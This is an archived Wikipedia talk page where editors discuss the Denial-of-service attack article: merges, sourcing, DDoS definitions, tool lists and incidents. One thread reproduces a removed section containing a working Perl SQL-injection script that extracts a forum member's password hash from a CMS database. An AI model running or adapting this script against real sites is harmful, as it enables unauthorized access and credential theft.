Talk:Denial-of-service attack/Archive 1

Twinge Attack?
Twinge attack is not mentioned at all and is an orphaned page so it might want to be included under ICMP flood.

Image DoSed
Interestingly, the image portraining DoS is DoSed. Ironic and very frustrating. At least IE and FF can't make it work, dunno about opera. 6/4/08 —Preceding unsigned comment added by 77.126.65.64 (talk) 08:46, 4 June 2008 (UTC)

Protected on 2006 April 18
Reason: Vulgarisms or nonsense was continuously added from different IPs to the article, or large portions removed. --Boborok 07:43, 18 April 2006 (UTC)

Cleanup
Bleh, I'm just going to start cleaning up this article starting at the top. It's going to be rough at first because I'm going to be more concentrated on changing the overall layout. Does anyone have any objections to removing the stuff that reads like an ad? Otherwise I'll do away with it and just pick out key points to be integrated into other sections. fintler 15:45, 23 June 2006 (UTC)

Syn attack is miscategorized under ICMP attacks. Syn attack is a TCP based attack. -Doug —Preceding unsigned comment added by 76.126.163.17 (talk) 08:16, 15 August 2008 (UTC)

Rewrote DDoS bit
Added some references I was bored.

Removed some of the stuff in the prevention and response section it was just leading up to the advertising that has previously been removed. Some of it was broad generalisations with no references backing it up some of it was factually wrong, This article needs some attention ;-)

It would be interesting to hear from the original author of the prevention and response section.

218.145.101.210 deleted most of the prevention bit so I reverted to revert by Omicronpersei8. 60.240.174.85 12:28, 24 July 2006 (UTC)

Discussion Points
I'm merging all of the old discussion (some going back to 2003-2004) and putting the points here so they can be discussed easier:


 * 1) Perhaps some mention should be given to the architecture of the internet responsible for unwanted outcomes by too-many-requests to begin with.  other network protocols exist which benefit rather than degrade with increased scaling of requests.  Freenet is one example.
 * 2) The similarity with slashdotting.
 * 3) "A final option, one which might be available to larger companies and networks, is to throw more hardware or bandwidth at the flood and wait it out."
 * 4) "A distributed reflector denial of service is an internet attack of a type first detected in 2005 ..." What? You are about 4 years late. Check that and correct it please.
 * 5) Mention of operating system/kernel-level defences
 * 6) Removing the ad-like content towards the bottom along with related ads —Preceding unsigned comment added by Fintler (talk • contribs)

New category 'Computer Network Security'
I propose to create a new category 'Computer Network Security' assign the same to this article along with many other related articles. Raanoo 06:51, 31 July 2006 (UTC)


 * There is already such a category, Category:Computer network security. This article's category, Category:Denial-of-service attacks, is in that category. It is a good idea for someone to go through the related article list as suggested to ensure that any articles that properly belong in this category or one of its subs are placed there. JonHarder 13:28, 31 July 2006 (UTC)


 * I think that much of what is on the DOS category could be moved into the DOS article. That will give the article a better chance of reaching featured status.  It will also get rid of the problem described above since the only sub-articles that would survive are those that are large enough to be left alone.  Thus, most of the stuff on the DOS category could be moved, once this is done, into the Computer Network Security cat.  I will slowly work on it. Brusegadi 06:07, 28 August 2007 (UTC)

DDos section innacuracies
A quick read of this article, and I can already see that it needs a lot of help. I will rewrite the next section to be a) correct b) readable.
 * A distributed denial of service attack (DDoS) occurs when multiple compromised systems flood the bandwidth or resources of a targeted system usually a web server(s). These systems are compromised by attackers using a variety of methods.

A few notes on this: Happy editing to all. Michael Billington (talk • contribs) 11:28, 6 August 2006 (UTC)
 * 1) "...when multiple compromised systems..." - The systems do not have to be compromised. DDos attacks are just as commonly from groups of willing users who don't realise they aren't anonymous. (ie script kiddies)
 * 2) "...usually a web server(s)..." - DDoS attacks affect clients just as (if not more) often than webservers. (see IRC_floods) This is the a big reason why some like to use Tor, to hide their IP from being DDoSed.
 * 3) Webserver DDoSes may actually be the Slashdot effect, but misdiagnosed. Client DDoSes are more of an IRC thing, but remember that the internet is not just WWW.
 * 4) Would we consider a crapflood a DDoS?

injection is DoS?
Should the === MySQL injection === section be in this article? although sql injection can cause a DoS condition, it is not a DoS attack in itself is it? If it is considered a DoS attack, should the code be a little bit more illustrative? it simply displays a general sql injection, not an sql injection that causes a DoS condition.

Overall i feel the section with sourcecode is confusing.

fv. —The preceding unsigned comment was added by Fedevela (talk • contribs) 17:24, 15 August 2006 (UTC).


 * It's OK by me to remove the section. The code portion isn't appropriate for an article. See WP:NOT an instruction manual. JonHarder 17:33, 15 August 2006 (UTC)

I will see if instead of completely removing the entry, I draft a DoS attack through an SQL injection. Will post it as soon as it is presentable. I'm excited on my first wikipedia contribution!!! Thanks for your reply Jon. Fedevela 20:09, 15 August 2006 (UTC)


 * Sounds good & welcome Wikipedia! JonHarder 20:35, 15 August 2006 (UTC)

Putting the old section here for now.

MySQL injection
MySQL is a free databasing language and program used in most forums to organize various rows and manage the site's sub-server. A MySQL Injection is a malformed MySQL code that affects the targeted database in varying ways. Due to safety reasons, the method of applying a MySQL Injection will be withheld. A written example of an injection is as follows:

use IO::Socket; $host = $ARGV[0]; $path = $ARGV[1]; $topic = $ARGV[2]; $id = $ARGV[3]; if (@ARGV < 4) { print "-\n"; print "-- This is a MySQL Injection --\n"; print "-- Coded by Some Hacker --\n"; print "-- I am a n00b Hacker --\n"; print "-- Usage: $0 [host] [path] [topic] [id] --\n"; print "-- Ex: $0 127.0.0.1 cws 2 2 --\n"; print "-\n"; exit; } $sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || die "Can't establish a    connection\n"; print $sock "GET /$path/index.php?page=forum&func=post&par=$topic HTTP/1.1\n"; print $sock "User-Agent: Mozilla/4.0\n"; print $sock "Host: $host\n\n"; while ($asd = <$sock>) { if ($asd =~ /Set-Cookie:/gi) { $asd =~ /cuser_id=([a-zA-Z0-9]{32})/; $cookie = $1; } } $sock->close; $socket = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || die "Can't establish a connection\n"; print "-- Connection Established --\n"; print $socket "GET  /$path/index.php?page=forum&func=post&par=$topic%20UNION%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%20member_id=$id/*  HTTP/1.0\n"; print $socket "User-Agent: Mozilla/4.0\n"; print $socket "Host: $host\n"; print $socket "Cookie: cuser_id=$cookie; chitcounter=hitcounter\n\n"; print "-- Waiting... --\n"; while($ans = <$socket>) { if ($ans =~ /([a-zA-Z0-9]{32})/){ if ($ans =~ /cookie/i) { next; }            print "\nmember id: $id \n"; print "md5 hash: $1 \n"; exit; } } Coded By: Derek H.
 * 1) !perl
 * 2) Greetz or begining message of the 404 would go here.

Fedevela 11:26, 16 August 2006 (UTC)

OK! finished editing that section ... i have not tested the code, and i am not positive you can insert EL expressions in the SQL tag like i'm doing. Nevertheless I think this sample illustrates the relationship between DoS and SQLInjection. Please let me know what you think! Fedevela 14:30, 16 August 2006 (UTC)

Should there be code offered here?
Given the extremely slow performance of Wikipedia navigation and page refreshes at certain times (earlier this afternoon, for example) while other sites respond normally, my non-technical suspicious mind wonders if there's a denial of service attack going on. I don't have the background to understand the code posted above, but based on the comments surrounding it I have to wonder if it's a good idea to allow such code examples anywhere at Wikipedia. --CliffC 21:24, 9 October 2006 (UTC)

*smirks*
''The person who hacked the box is NOT eligible, nor are members of the Honeynet Project. Members of the Honeynet Research Alliance or companies employing Honeynet Project members are eligible (and encouraged!) to enter, but their entries (even if Top 20) will not receive copies of Know Your Enemy. The books go to other entrants.''

From the Honeywell Project page. No particular relevance to this article; just thought it was amusing. :p --Veratien 01:03, 2 December 2006 (UTC)

Client Puzzle Protocol
- has been proposed as a solution to DoS. Maybe we should mention this? —The preceding unsigned comment was added by Cdamama (talk • contribs) 03:05, 13 December 2006 (UTC).


 * looks completely useless to me. Most DoS attacks do not require a complete connection to be made so any sort of "puzzle protocol" can't even be started.  Wrs1864 03:11, 13 December 2006 (UTC)

Effects
''If the DoS is conducted on a sufficiently large scale, entire geographical swathes of Internet connectivity can also be compromised by incorrectly configured or flimsy network infrastructure equipment without the attacker's knowledge or intent. For this reason, most, if not all, ISPs ban the practice.''

No. "Accidentally breaking the internet" is not why ISPs ban DoS attacks. ISPs ban DoS attacks because they intentionally break the internet. (See TOS §3.1.1 Breaking the Internets)

Removed second sentence. &mdash;Ryan 06:54, 6 March 2007 (UTC)

Removed make technical articles accessible tag
The   tag was added June 23 of 2006, but I'm not entirely clear on why, or that it remains applicable. I've gone ahead and removed it.

If anyone believes it still applies, feel free to re-add it — but please provide a specific explanation of why it's necessary, as per these standards: "You should put an explanation on the talk page with comments on why you believe it is too technical, or suggestions for improvement. Templates added without explanation are likely to be either ignored or removed." livefastdieold 00:41, 15 April 2007 (UTC)

Cleaned up links
I cleaned up the links as there were mulitbles of the same site and un-needed links that were borderline spam. War  rush 

Merge from Nuke
I think the merge is good. I will do it if the editors who are most involved with this page think it is not a problem. I think merging them will give this article a boost towards featured status. Brusegadi 00:23, 26 August 2007 (UTC)
 * Done! Brusegadi 05:52, 28 August 2007 (UTC)

Merge from Teardrop
The source is so small that, at least for now, it makes sense to merge. I will proceed as I did with the merge for nuke. Brusegadi 06:54, 29 August 2007 (UTC)
 * Done. Brusegadi 05:09, 31 August 2007 (UTC)

Intentions?
What do we think about this statement?

Although most DDoS attacks are malicious in nature, the same technique can be used to aid the Internet community. --Leus 21:07, 4 September 2007 (UTC)


 * Should be removed. I will go through the entire article and look for proper sources and remove such statements.  Thanks for the note. Brusegadi 04:26, 5 September 2007 (UTC)

Fair use rationale for Image:Yahelitescrnscap.JPG
Image:Yahelitescrnscap.JPG is being used on this article. I notice the image page specifies that the image is being used under fair use but there is no explanation or rationale as to why its use in this Wikipedia article constitutes fair use. In addition to the boilerplate fair use template, you must also write out on the image description page a specific explanation or rationale for why using this image in each article is consistent with fair use.

Please go to the image description page and edit it to include a fair use rationale. Using one of the templates at Fair use rationale guideline is an easy way to insure that your image is in compliance with Wikipedia policy, but remember that you must complete the template. Do not simply insert a blank template on an image page.

If there is other fair use media, consider checking that you have specified the fair use rationale on the other images used on this page. Note that any fair use images uploaded after 4 May, 2006, and lacking such an explanation will be deleted one week after they have been uploaded, as described on criteria for speedy deletion. If you have any questions please ask them at the Media copyright questions page. Thank you.

BetacommandBot 18:31, 13 September 2007 (UTC)

Merge with Meow wars
Someone tagged Meow wars to merge here. Discuss.


 * Support. It has no evidence of notability or much in the way of reliable sources itself, so does not rate a whole article, but there's enough to it to be worth a mention in the topic it applies to. Dicklyon 16:07, 23 September 2007 (UTC)
 * Go for it. Just name the subsection 'Meow wars' or something and then only transfer a shortened version of everything.  Note that if you move the entire thing the article is going to get too big. Brusegadi 16:40, 23 September 2007 (UTC)
 * Oppose (I think). Meow wars seems closer to a social phenomenon than a denial of service (are we next going to add Wikipedia vandalism, spam (electronic), and any number of random flame wars and people trying to annoy each other on the net?).  The meow wars article could use some work, but I'd probably sooner merge it to Usenet than to here.  Or keep it as its own article; it was kind of a big deal within the world of usenet even if it seems obscure in a wider context (establishing WP:N is kind of a can of worms for many online phenomena, but that's an issue whether it is its own article or just a section in another article). Kingdon 18:06, 16 October 2007 (UTC)
 * Actually that isn't really true. Notability matters in all cases but there are a lot of things which are noteable enough for a brief mention in another article but not for a seperate article Nil Einne 12:50, 21 October 2007 (UTC)


 * I have to agree with Kingdon. I think that the Meow wars page needs more work before it's merged with anything really. Perhaps you could make reference to the Meow wars being an early/primitive form of DOS attack and link to the article? Where the article stands now, I don't think there's enough solid information and sources cited to back up what's been said. CoyoteWildfire 10:14, 24 October 2007
 * I also agree with Kingdon. --Amaraiel 14:19, 24 October 2007 (UTC)
 * Oppose Meow wars is an interesting article in its own right, but it needs some work. Bitplane 23:37, 17 December 2007 (UTC)


 * Oppose, as people have pointed out they are not quite the same thing as well as merging serves no useful purpose regardless in this instance. Mathmo Talk 00:40, 24 January 2008 (UTC)

Anonymous vs. Church of Scientology
http://youtube.com/watch?v=YnEqXMMCDEc —Preceding unsigned comment added by 71.128.69.207 (talk) 19:17, 27 January 2008 (UTC)

Statistics
Just found this on ITPROs news section:

"DOS attacks are also becoming increasingly common. During the first six months of 2006, Symantec observed an average of 6,110 DoS attacks per day."

http://www.itpro.co.uk/security/news/98616/analysis-websites-struggling-for-legal-recourse-for-dos-attacks.html

Anyone think the statistic is worth including? It'll give a better idea of how occurrent the problem has become...

Also, I'm rubbish at editing so if anyone wants to put it in... —Preceding unsigned comment added by 86.149.69.210 (talk) 07:45, 18 March 2008 (UTC)

Not completely wikified.
I've added some internal links to the section that needs to be wikified, but I don't feel that there are enough for it to be up to Wikipedia's standards. I've also changed the acronym "DDoS" in that section to "DoS" (but in that section only) because, from my understadning, a DDoS attack is just a form of a DoS attack. I didn't remove the Wikify template, though, becasue I felt that it wasn't up to standard. Thanks. Totakeke423 (talk) 10:25, 29 March 2008 (UTC)

Suggestions
The following suggestions were generated by a semi-automatic javascript program, and might not be applicable for the article in question. You may wish to browse through User:AndyZ/Suggestions for further ideas. Thanks,   CWii ( Talk  22:04, 2 May 2008 (UTC)
 * There may be an applicable infobox for this article. For example, see Template:Infobox Biography, Template:Infobox School, or Template:Infobox City.[?] (Note that there might not be an applicable infobox; remember that these suggestions are not generated manually)
 * When writing standard abbreviations, the abbreviations should not have a 's' to demark plurality (for example, change kms to km and lbs to lb).
 * There are a few occurrences of weasel words in this article- please observe WP:AWT. Certain phrases should specify exactly who supports, considers, believes, etc., such a view.
 * correctly
 * might be weasel words, and should be provided with proper citations (if they already do, or are not weasel terms, please strike this comment).[?]
 * Watch for redundancies that make the article too wordy instead of being crisp and concise. (You may wish to try Tony1's redundancy exercises.)
 * Vague terms of size often are unnecessary and redundant - “some”, “a variety/number/majority of”, “several”, “a few”, “many”, “any”, and “all”. For example, “ All pigs are pink, so we thought of a number of ways to turn them green.”
 * Avoid using contractions like (outside of quotations): doesn't, aren't.
 * Please ensure that the article has gone through a thorough copyediting so that it exemplifies some of Wikipedia's best work. See also User:Tony1/How to satisfy Criterion 1a.[?]

political examples
The article is missing info on examples of politically motivated DoSs; see --Espoo (talk) 13:11, 21 May 2008 (UTC)

I see someone has recently added some political examples. Unfortunately, what was added strongly suggest partisan politial motive more than any desire to add to the article's factual content.

The story about the DOS attacks that were traced back to addresses belonging to barackobama.org appeared almost simultaneously on a number of anti-Obama and far-right blogs and forums. The addition to the Wikipedia article was made almost immediately, and the wording echos what you'll find on those same blogs and forums. The links found in the article footnotes lead to such blogs. These hardly constitute reliable sources.

Obviously there's a fundamental illogic to the thought that Obama supporters would launch a DOS attack from addresses that would immediately be traced to barackobama.org. When one considers how easily ownership information can be falsified when registering an IP address, it's pretty obvious what's going on here. Conspiracy theorists like the term "false flag operation". A factual Wikipedia article is being used to lend credibility to the scam.

The addition should be removed immediately, unless credible sources can be cited that clearly establish a connection between the Obama campaign and the DOS attack. I have no official standing at Wikipedia, so I will not presume to do that myself. GSH4.224.132.19 (talk) 01:04, 5 August 2008 (UTC)

Relevant Incidents
Is the 4chan DDoS attack really big and relevant enough to be included in the Incidents section? Sure it is currently being DDoSed, but if we included every time a chan site or other internet community has been DDoSed this section would be way too long. Heck, this isn't even the first time 4chan has been a victim of this kind of attack. I didn't make the edit and remove the 4chan reference because I wanted to hear some more opinions, but I think we should consider whether we want to make this list more inclusive and add more incidents, or short and only referencing the most famous examples, as it currently is. 72.141.104.5 (talk) 02:30, 28 July 2008 (UTC)

Wireless?
Is anyone else bothered by this page treating wired and wireless attacks separately? Are we including RF jamming as a DoS attack? While yes, taken literally, it is a denial of service, I think categorizing wired and wireless attacks as different beasts is the wrong approach.

A DoS attack is a data-based attack on a network layer. It has to take place based on the rules of the network data layer. Overloading WiFi antennas seems like the same sort of attack as hooking a car battery up to an Ethernet cable. Effective, but not the kind of DoS that this article should deal with. http://en.wikipedia.org/wiki/Denial-of-service_attack#Means Alvis (talk) 07:09, 27 December 2008 (UTC)

If it deals with Dos it should deal with all Dos, and there stealing your power cable is a sort of Dos attack. 21:17 14/2 2009 (GMT) —Preceding unsigned comment added by 79.102.158.149 (talk)

Agreed, but stipulating high gain antennae and 300mW cards branded NIC manufactured by a particular company and not widely available outside the United States? Perhaps not relevant... Andmark (talk) 01:52, 11 June 2009 (UTC)

Removal of DoS-attacks program list from article
This list of programs has been removed from the article many times in the past.

Considering a white paper was provided as a proper reference and clearly names most of these programs and considering the rest seem to pass the search engine test, they can hardly be considered "not notable".

Wikipedia is not censored and simply mentioning these programs alone does not make this a "howto" guide.

This list is far from complete and only seems to mention a handful of the many DoS programs. A complete list and thorough overview of these programs would likely require a separate article but this hardly justifies removing them outright.

Tothwolf (talk) 01:00, 1 February 2009 (UTC)


 * This list of program names doesn't add much besides clutter to the article, and it attacts people who like to add other program names that they have heard of. If these programs were really that significant, at least a few of them should have articles by now.  As it is, it is just a list of names that some people claim are used for DoS attacks.  Search engine tests are, as the article says, a first-pass heuristic.  Wikipdia is WP:NOT an WP:INDISCRIMINATE collection of information. This is not censorship, this is just applying WP:WEIGHT.  Any "list of" article that lists these kinds of programs will likely need to grab more sources and will start with a longer list, but considering how quickly these kind of programs surface and then disappear, I'm not sure if there will ever be such an article. Wrs1864 (talk) 02:56, 1 February 2009 (UTC)


 * If this information was indeed WP:INDISCRIMINATE and not properly sourced, I would agree with you. However, these programs are mentioned in the whitepaper provided as the reference to this section and are very much valid to the subject of this article.  I was able to find other references fairly quickly with Google so it wouldn't be difficult for someone so inclined to further expand this section.  As for WP:WEIGHT, I can't see how you'd even begin to apply that to this list.
 * I will agree with you in that lists can sometimes add clutter to an article. In this particular case this list is short and doesn't seem to hurt the rest of the article in any way.
 * As for people adding to a list, Wikipedia would not exist if people did not take the time to expand articles. That may involve anything from simply adding information to a list to expanding a stub to rewriting entire articles.
 * I would ask that you revert your last edit where you again removed this list and leave these intact until a clear consensus can be had on this matter. Tothwolf (talk) 03:39, 1 February 2009 (UTC)

Hack a Day Reference?
I don't really like how the article is worded to seem as though Hack a Day is an organization of computer hackers. Anyone who visits Hack a Day (like myself) would find that Hack a Day is simply a weblog (Such as Engadget) that breaks news about technology and how it can be "hacked" for recreational purposes. They do not condone illegal activities. Plus, if you look at the other sources for that same paragraph, Arstechnica and Softpedia also ran similar articles but they were not mentioned. Someone please revise this biased wording.

Merge from billion laughs attack
I just briefly put together an article about the Billion laughs attack, which should probably in the end be merged with this article. But right now it is not up to standard, so some of you guys might want to improve it first. --Eyetoy2 (talk) 12:19, 12 June 2009 (UTC)

Stop associating Windows 7 and teardrop!
Guys, the article on Slashdot about Windows 7's vulnerability has NOTHING to actually do with teardrop! It was only an example of a previously known exploit. It's the slashdot equivalent of media hype. They are NOT the same thing in any way. teardrop is generic to IP packets. The new exploit is SPECIFIC to an SMB "negotiate protocol request" query. 96.227.71.85 (talk) 07:42, 13 September 2009 (UTC)

needs a redirect from "dos attacks" and "DOS attacks" for clarity.
Seems the article needs a redirect from "dos attacks" and "DOS attacks" for clarity and ease of use. If the page is to be accessible for people who want to know the definition one cannot presume they are aware of the minuscule in the letter o in the term DoS attack. —Preceding unsigned comment added by 84.215.44.195 (talk) 02:45, 9 October 2009 (UTC)

RE PAREA ᾂᾂἎἎὈ

08 Juin 2010
There are two link on this page (VIPDoS and a Denial of service (Dos)) that link to this same page. —Preceding unsigned comment added by 74.56.77.65 (talk) 01:31, 9 June 2010 (UTC)

motives?
Nothing here about motives. Why do people launch the attacks? Call me naive but it might be a useful addition to the article. Spanglej (talk) 01:55, 6 August 2010 (UTC)

people launch those attacks to test the security of their network ( pen testing ) or because they need a life.... —Preceding unsigned comment added by 95.96.35.121 (talk) 19:14, 7 August 2010 (UTC)

Untitled
Use of the phrase script kiddie in the article makes it biased and sounds unencyclopedic. —Preceding unsigned comment added by 128.30.9.210 (talk) 18:01, 18 October 2010 (UTC)

Distributed attack
... Simple attacks such as SYN floods may appear with a wide range of source IP addresses, giving the appearance of a well distributed DoS. These flood attacks do not require completion of the TCP three way handshake and attempt to exhaust the destination SYN queue or the server bandwidth. Because the source IP addresses can be trivially spoofed, an attack could come from a limited set of sources, or may even originate from a single host. Stack enhancements such as syn cookies may be effective mitigation against SYN queue flooding, however complete bandwidth exhaustion may require involvement
 * Punctuation is missing at the end. It would be also interesting what kind of involvement. ENTi (talk) 06:05, 26 May 2011 (UTC)


 * That was added as you quoted it by on 2010-02-03. I've left a note on their talk page and marked the paragraph. --Kvng (talk) 13:42, 28 May 2011 (UTC)

Lulz
So... Can we get Lulz Security here? I think they are pretty major after today... But there's hype for more to come! *subscribes to all newscasts* 70.54.3.186 (talk) —Preceding undated comment added 23:04, 14 June 2011 (UTC).

Stacheldraht/Stachledraht
Stacheldraht seems to be the correct spelling as this is used more. But the image is incorrectly spelt. The incorrect spelling is also in the image. Does anyone know how to correct spelling in an image? QuentinUK (talk) 11:29, 14 June 2011 (UTC)


 * Misspelling has been noted on the image talk page. --Kvng (talk) 23:03, 18 June 2011 (UTC)

Regular expression Denial of Service
The Regular expression Denial of Service article is only mentioned in the See also section of this article. Maybe it'll help the orphan issue if it was integrated into the "Methods of attack" header? 76.194.219.196 (talk) 05:30, 27 June 2011 (UTC)

My understanding is that DoS attacks are relatively easy to orchestrate, requiring very little sophistication or resources, hence the association with script kiddies. If this is the case, I think it's encyclopedic information and should be mentioned, if only in a line or two in the intro.--Atkinson (talk) 02:52, 11 February 2012 (UTC)

Needs section on legality
The article should have a section on the legality of DDos. Since the targets are typically public websites, making a connection is not illegal. There have also been claims that DDos can be seen as a legitimate form of protest. http://www.zdnet.com/blog/igeneration/for-and-against-ddos-attacks-as-a-legitimate-form-of-protest/7167 It's illegal in the UK  pgr94 (talk) 14:35, 28 January 2011 (UTC)
 * Just spotted the small section at the bottom of the article. It's a start, but could definitely use expanding. pgr94 (talk) 14:47, 28 January 2011 (UTC)

It's my understanding that actively responding (retaliating) to a perceived DDos attacker is illegal in some areas. I would like to see an expansion of that in the Legal section, if appropriate. — Preceding unsigned comment added by 216.57.96.1 (talk) 16:03, 30 June 2011 (UTC)

I added my bit from what I know, although I have stated it informally and it needs editing. 131.91.136.234 (talk) 17:38, 15 March 2012 (UTC)

Permanent denial-of-service attacks section
The section seems unclear as a whole and seems to be coming from the ideas of a single individual. In the sources there are references to the firmware update process of embedded devices. While the possibly to exploit limited write cycles in flash memory seems reasonable there is no reference to this in the article and the source does not state which specific devices are affected. Neither there is any information on what kind of access to the device the attacker would have to have. Please clarify and verify the section or remove it. — Preceding unsigned comment added by 86.32.198.11 (talk) 16:40, 3 October 2010‎ (UTC)


 * Actually overwriting a device's firmware isn't a denial-of-service attack but something much more serious. I'm not sure why this is in this article at all. K7L (talk) 13:02, 25 June 2013 (UTC)
 * Probably related to the catchy coined name – "permanent denial of service" – used to promote the idea. But yeah, I suppose that using the same rationale as this, setting off a bomb at a business's server location could be included here too; it would certainly deny service. Although the firmware alteration is more closely related to the traditional DoS attack in that it is accomplished remotely by use of software.


 * The source article is five years old. At that time, it discussed a concept with no known actual occurrences "in the wild". Do we know if there have been any in the interim? Fat&#38;Happy (talk) 16:56, 25 June 2013 (UTC)


 * The only way to download firmware to a router or network device is with the password to that device. The attack is theoretically possible as some equipment is deployed with default passwords (like "admin/admin" or "root/admin" for residential gateway routers) but isn't DOS as the latter is based on flooding a node with pointless requests and traffic to overload it. The "PDoS" terminology appears to be an HP concoction concocted in 2008 to market that firm's security product. It received some coverage at the time    and was then promptly forgotten. Worth a mention somewhere, just not here. Maybe phlashing is a trojan horse (computing) and not a DOS? K7L (talk) 17:19, 25 June 2013 (UTC)

ECommerceWisdom.com dubious
The author's name in cite #28, Carl Abante, appears nowhere on http://www.ecommercewisdom.com (searched), and not on the domain registration. The site is promoting AbanteCart. --Lexein (talk) 08:25, 12 December 2013 (UTC)

Amplification factors
The amplification factors provided from US-CERT under "Reflected / Spoofed attack" are not absolute. Saying that an attack has an amplification factor of X is like saying it is always 75 degrees in San Diego. It might be, or it might be some other temperature. Recommend expanding this section to clarify that amplification factors are in fact variable and not exactly as provided by US-CERT, although they could be close in many cases. Ddosguru (talk) 11:42, 3 August 2014 (UTC)

BCP 38
BCP 38 should be mentioned as a primary means of thwarting these attacks. This also looks useful. I will integrate this when I get time. Anyone else is welcome jump in and do it. ~KvnG 04:00, 26 February 2014 (UTC) gfgg\ — Preceding unsigned comment added by 197.40.99.3 (talk) 20:54, 25 September 2014 (UTC)

Proposed merge with Hit-and-run DDoS
Content fork - overlapping scope and (current) lack of sources establishing independent notability. Arguably correct method should have been WP:SPINOUT. Suggest merge. Widefox ; talk 05:50, 9 August 2014 (UTC)


 * Support ~KvnG 14:08, 12 August 2014 (UTC)
 * We strongly discourage just making a vote. Look at WP:NOTDEMOCRACY.Forbidden User (talk) 15:10, 19 August 2014 (UTC)


 * Oppose (At least now) there are 6 sources for this article, so I'd say that the lack of sources from before is not much of a problem any more. As for content duplication, the only redundant information that I can find in the Hit-and-run DDoS article is the sentence "A DDoS attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service." Orthogonal1 (talk) 02:42, 28 September 2014 (UTC)

Degradation-of-service slang name
A common slang name on the internet for a degradation-of-service attack is "bandwidth rape." —Preceding unsigned comment added by 72.88.79.65 (talk) 23:17, 20 October 2010 (UTC)
 * I don't think that this usage is common enough to be put in the article. Orthogonal1 (talk) 02:57, 28 September 2014 (UTC)

Is Wikipedia being DoS'd?
I'm having great difficulty with page loads the last few hours and I'm now seeing a lot of packet loss (via mtr - matt's trace route) in the last couple hops to en.wikipedia.org. Anyone seeing the same or different? --Elvey(t•c) 02:07, 25 July 2015 (UTC)
 * I suppose I could post to the technical village pump...  Packet loss is high - 10-20% - but is that high enough to cause the page load difficulty I'm seeing (perhaps 8/10 or 9/10 page loads failing). --Elvey(t•c) 02:09, 25 July 2015 (UTC)

Renaming to "Denial-of-service network attack"
What do people think of this? Wikipedia had no coverage of resource exhaustion attacks until I created the page two minutes ago. Denial-of-service attacks are comprised of:


 * resource exhaustion attacks (most notably memory leaks and file descriptor leaks)
 * more discrete and precise DoS attacks such as null pointer dereferences and infinite loops
 * distributed network DoS

This article only covers the network DDoS, and DoS a big enough topic that I think two articles are warranted. Risc64 (talk) 23:35, 1 January 2016 (UTC)



I'm guessing that it may be a smart move to split Denial of Service Attack and Distributed Denial of Service Attack into two different articles.

Also it looks like Denial-of-service attack is getting a little large for an article and should have links to some smaller articles.

FockeWulf FW 190 (talk) 16:13, 13 March 2016 (UTC)

List of tools for DoS attacks and load testing
It would be helpful to have a list of tools for DoS and load testing in order to improve the articles being verifiable.

This would help with references on the article since there are multiple issues on information being verifiable on weather certain tools actually exist.

Since there's issues with finding references on the tools and this leads to the information being unverifiable.

FockeWulf FW 190 (talk) 21:43, 12 March 2016 (UTC)

I've created a draft for this and hope to see the list increase Draft:List of tools for Denial-of-service attacks.

FockeWulf FW 190 (talk) 21:07, 7 April 2016 (UTC)

Booter/stresser industry
I've started a section on the booter/stresser phenomenon. Brian Krebs is the leading researcher on this, but more sources are available; I'd appreciate any help with filling out this section. -- The Anome (talk) 13:23, 9 September 2016 (UTC)

Today, the most recent big big DDoS attack!
See https://www.hackread.com/ddos-attack-dns-sites-suffer-outage/ PS: I was a victim, lost my server online installation process (apt-gets, etc. and github sources) during the attack :-) --Krauss (talk) 20:08, 21 October 2016 (UTC)

Merge from Shrew attack
It seems doubtful that the topic of Shrew attack has a stand-alone notability. I suggest merging this one sentence, which could be expanded to a paragraph at most, here. --Piotr Konieczny aka Prokonsul Piotrus&#124; reply here 05:41, 12 September 2016 (UTC)


 * Support - a new subsection in Denial-of-service_attack for this would be appropriate. ~Kvng (talk) 14:15, 14 September 2016 (UTC)

History of attacks
This article has nothing on the history of this topic. For example, when was the first time an attack occurred? When was the name "denial-of-service attack" coined? Who thought of it? AtHomeIn神戸 (talk) 05:10, 16 January 2017 (UTC)
 * I don't think we can know for certain the first time a DOS attack occurred, but see this article for a DOS attack which happened in 1974. Orthogonal1 (talk) 21:33, 12 May 2017 (UTC)

Proposed merge with Application layer DDoS attack
Content fork - overlapping scope and (current) lack of sources (and content - OSI model and DDoS) establishing independent notability. Arguably correct method should have been WP:SPINOUT. Suggest merge. Widefox ; talk 06:00, 9 August 2014 (UTC)


 * Support ~KvnG 14:08, 12 August 2014 (UTC)
 * We strongly discourage just making a vote. Look at WP:NOTDEMOCRACY.
 * ✅ Klbrain (talk) 11:04, 19 June 2017 (UTC)

Market for Stressers
I just created the redirect Stresser to this page, I note there is no information about the commercial market for DoS which is marketed as 'stressers'. Deku-shrub (talk) 12:02, 22 August 2017 (UTC)


 * That's putting the cart before the horse. Do you have any sources that could give us the reliable information we need to add this to the article? ~Kvng (talk) 14:42, 25 August 2017 (UTC)

External links modified
Hello fellow Wikipedians,

I have just modified one external link on Denial-of-service attack. Please take a moment to review my edit. If you have any questions, or need the bot to ignore the links, or the page altogether, please visit this simple FaQ for additional information. I made the following changes:
 * Added archive https://web.archive.org/web/20140714140141/http://www.arbornetworks.com/arbor-partner/alliances/technology-alliances/clean-pipes-2-0 to http://www.arbornetworks.com/arbor-partner/alliances/technology-alliances/clean-pipes-2-0

When you have finished reviewing my changes, you may follow the instructions on the template below to fix any issues with the URLs.

Cheers.— InternetArchiveBot  (Report bug) 00:58, 3 December 2017 (UTC)

C-class
I have reassessed the article from B- to C-class. All maintenance tags need to be addressed to qualify for B-class. I'm less than a quarter the way through reviewing the article and it is clear that there are some organizational issues that also need to be resolved. ~Kvng (talk) 17:32, 17 December 2018 (UTC)

First DNS
I think the first DNS was caused by an oversite. I worked on the Ramada Inns reservation. It was a dial in system. We used TI-990 mini-computers in the hotels/motels that were programed to call in at mednight to get or recive messages. Our reservation center was in Ohma because WATs, (800), lines were cheap there and provided hourly rates so more and less could be used on a hourly basis. Ramada Home office was in Phoenix Az. We had full time leased line to our terminal controllers in Ohma.

We had around 1000 installed reservation terminals in place. All programed to call in at mednight to delever and resive low priority mrssages. The omha computers went down. No one to answer to answer. Our hotel computets were programed to wait a few minutes and retry. So we had 1000 computers calling in. Failing to connect. Delay a fixed time and retry.

We shut down long distance phone calls for several hours.

We had military vehicles surrounding our building when I cane in to work. The eas in the mid 1970s. Steamerandy (talk) 15:31, 26 April 2020 (UTC)

history section suggestion
